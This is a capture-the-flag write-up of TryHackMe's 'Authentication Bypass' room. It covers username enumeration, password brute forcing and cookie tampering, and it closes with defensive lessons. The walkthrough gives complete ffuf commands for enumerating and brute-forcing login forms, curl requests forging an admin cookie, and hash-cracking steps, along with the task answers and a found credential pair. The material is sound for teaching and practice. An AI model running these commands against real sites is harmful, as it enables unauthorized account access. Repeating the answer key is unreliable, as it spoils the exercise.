Authentication Bypass
Overview
Room URL: https://tryhackme.com/room/authenticationbypass
Difficulty: Easy
Category: Web Application Security/Authentication
Objective
Learn how to exploit common authentication vulnerabilities including username enumeration, brute force attacks, and logic flaws in cookie-based authentication systems.
Table of Contents
Introduction
Walk Through
Lessons Learned
Resources
Introduction
What are Authentication Vulnerabilities?
Authentication vulnerabilities are weaknesses in the way applications verify user identity. These flaws can allow attackers to:
- Enumerate valid usernames
- Brute force passwords
- Bypass authentication mechanisms
- Gain unauthorized access to accounts
- Escalate privileges
Why This Matters
Authentication is the first line of defense for web applications. Weak authentication mechanisms can lead to:
- Account takeovers
- Unauthorized access to sensitive data
- Privilege escalation
- Complete system compromise
Technique 1: Username Enumeration
What is it?
Username enumeration is the process of identifying valid usernames in a system by analyzing application responses. This is often the first step in an authentication attack.
Common Indicators:
- Different error messages for valid vs. invalid usernames
- Different response times
- Different HTTP status codes
- Different page content or redirects
Why This is Dangerous:
Once attackers have a list of valid usernames, they can:
- Focus brute force attacks on known accounts
- Attempt credential stuffing with leaked passwords
- Target specific users for social engineering
Tool: ffuf for Username Enumeration
ffuf can be used to test multiple potential usernames against a registration or login form and identify which ones already exist in the system.
Basic Syntax for POST Requests:
ffuf -w [wordlist] -X POST -d "param1=FUZZ¶m2=value" -H "Content-Type: application/x-www-form-urlencoded" -u [URL] -mr "[match-text]"
Key Flags:
-w: Wordlist containing potential usernames-X: HTTP method (POST in this case)-d: Data to send in the POST requestFUZZ: Keyword that gets replaced with wordlist values-H: Additional headers (Content-Type for form data)-u: Target URL-mr: Match text - only show responses containing this text
Technique 2: Brute Force Attacks
What is it?
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or a list of usernames until a valid combination is found.
How it Works:
The attacker uses wordlists containing:
- Common passwords (password123, qwerty, etc.)
- Leaked password databases
- Dictionary words
- Password patterns
Multiple Wordlists in ffuf:
When using multiple wordlists (usernames + passwords), you need to specify custom keywords instead of just FUZZ.
Syntax:
ffuf -w [wordlist1]:W1,[wordlist2]:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u [URL] -fc [filter-code]
Key Flags:
-w [file]:W1,[file]:W2: Multiple wordlists with custom keywordsW1,W2: Custom keywords for each wordlist-fc: Filter by HTTP status code (exclude specific codes)
Why -fc 200 is Used:
A successful login typically redirects (302) or shows a different status code, while failed attempts return 200. By filtering out 200 responses, we only see successful authentications.
Technique 3: Logic Flaws - Cookie Manipulation
- Session management
- User preferences
- Authentication state
Method 1: Plain Text Cookies
What is it?
Some applications store authentication data in cookies as plain, readable text.
Example:
Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/
The Vulnerability:
If the server trusts cookie values without server-side validation, an attacker can simply modify these values.
Testing with curl:
curl -H "Cookie: logged_in=true; admin=true" http://target.com/page
Method 2: Hashed Cookies
What is Hashing?
A hash is a one-way cryptographic function that converts data into a fixed-length string of characters. The same input always produces the same output, but the process cannot be reversed.
Common Hash Types:
| Original | Hash Method | Output |
|---|---|---|
| 1 | MD5 | c4ca4238a0b923820dcc509a6f75849b |
| 1 | SHA-1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| 1 | SHA-256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| 1 | SHA-512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
The Vulnerability:
While hashes can't be reversed, they can be looked up in databases of pre-computed hashes.
Tools:
- https://crackstation.net/ - Database of billions of hashes
- HashCat - Offline hash cracking tool
- John the Ripper - Password cracking tool
Method 3: Encoded Cookies
What is Encoding?
Encoding converts data into a different format using a scheme that can be easily reversed. Unlike hashing, encoding is designed to be reversible.
Purpose of Encoding:
- Convert binary data to human-readable text
- Safely transmit data over mediums that only support ASCII characters
- NOT for security (it's easily reversible)
Common Encoding Types:
- Base32: Uses A-Z and 2-7
- Base64: Uses a-z, A-Z, 0-9, +, /, and = for padding
Example:
Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==
Decoded:
{"id":1,"admin":false}
The Attack:
- Decode the base64 string
- Modify the JSON (change admin to true)
- Encode back to base64
- Send modified cookie
Tools:
- Command line:
echo [string] | base64orecho [string] | base64 -d - Online: https://www.base64decode.org/
- CyberChef: https://gchq.github.io/CyberChef/
Walk Through
Task 1: Username Enumeration
Objective: Find valid usernames on the Acme IT Support signup page
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
- Create a file called
valid_usernames.txtwith the discovered usernames - Review results to answer questions
Answers:
Username starting with si***: simon
Username starting with st***: steve
Username starting with ro****: robert
Task 2: Brute Force Attack
Objective: Use valid usernames to brute force passwords on the login page
Note: Ensure your valid_usernames.txt file contains only clean username data (one username per line, no extra output).
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200
Command Breakdown:
valid_usernames.txt:W1- First wordlist (usernames) referenced as W110-million-password-list-top-100.txt:W2- Second wordlist (passwords) referenced as W2-d "username=W1&password=W2"- POST data using both wordlists-fc 200- Filter out HTTP 200 responses (failed logins)
- Wait for ffuf to find valid username/password combination
Answer: steve/thunder
Task 3: Cookie Manipulation - Plain Text
Objective: Manipulate plain text cookie values to gain admin access
Step 1: Test Initial Request
curl http://MACHINE_IP/cookie-test
Response: "Not Logged In"
Step 2: Set logged_in Cookie
curl -H "Cookie: logged_in=true; admin=false" http://MACHINE_IP/cookie-test
Response: "Logged In As A User"
Step 3: Set Both Cookies to True
curl -H "Cookie: logged_in=true; admin=true" http://MACHINE_IP/cookie-test
Response: "Logged In As An Admin" + Flag
Answer: THM{REDACTED}
Task 4: Cookie Manipulation - Hashing
Objective: Crack an MD5 hash found in a cookie value
- Take the hash:
3b2a1053e3270077456a79192070aa78 - Navigate to https://crackstation.net/
- Paste the hash and submit
- Retrieve the cracked value
Answer: 463729
Task 5: Cookie Manipulation - Encoding/Decoding
Part 1: Decode Base64 Cookie
Objective: Decode the base64 string: VEhNe0JBU0U2NF9FTkNPRElOR30=
Method 1: Command Line
echo "VEhNe0JBU0U2NF9FTkNPRElOR30=" | base64 -d
Method 2: Online Tool
- Visit https://www.base64decode.org/
- Paste the string and decode
Answer: THM{REDACTED}
Part 2: Encode to Base64
Objective: Encode {"id":1,"admin":true} to base64
Method 1: Command Line
echo -n '{"id":1,"admin":true}' | base64
Method 2: Online Tool
- Visit https://www.base64encode.org/
- Paste the JSON and encode
Answer: eyJpZCI6MSwiYWRtaW4iOnRydWV9
Lessons Learned
- Username enumeration through error messages is a critical first step in authentication attacks
- Verbose error messages that differentiate between invalid usernames and incorrect passwords are a security vulnerability
- ffuf is a versatile tool that can perform both username enumeration and brute force attacks with proper wordlists
- Multiple wordlists can be used simultaneously in ffuf using custom keywords (W1, W2, etc.)
- Filtering responses by status code (
-fc) or matching regex (-mr) is essential for identifying successful attacks - Plain text cookies storing authentication state are easily manipulated and should never be trusted without server-side validation
- Cookie values should always be validated server-side, not just checked client-side
- Hashing provides one-way transformation but common values can be looked up in rainbow tables and hash databases
- MD5 and SHA-1 are considered cryptographically broken and should not be used for security purposes
- Encoding (like Base64) is NOT encryption - it's easily reversible and provides no security
- Base64 encoded cookies can be decoded, modified, and re-encoded to change application behavior
- Never store sensitive authorization data (like admin status) in cookies without cryptographic signatures
- Proper authentication systems should use signed session tokens or JWTs to prevent tampering
Resources
TryHackMe
ffuf - Fast Web Fuzzer
SecLists - Wordlist Collection
CrackStation - Hash Lookup
Base64 Decode
Base64 Encode
CyberChef - Data Analysis Tool
OWASP Authentication Cheat Sheet
HTTP In Detail - TryHackMe Room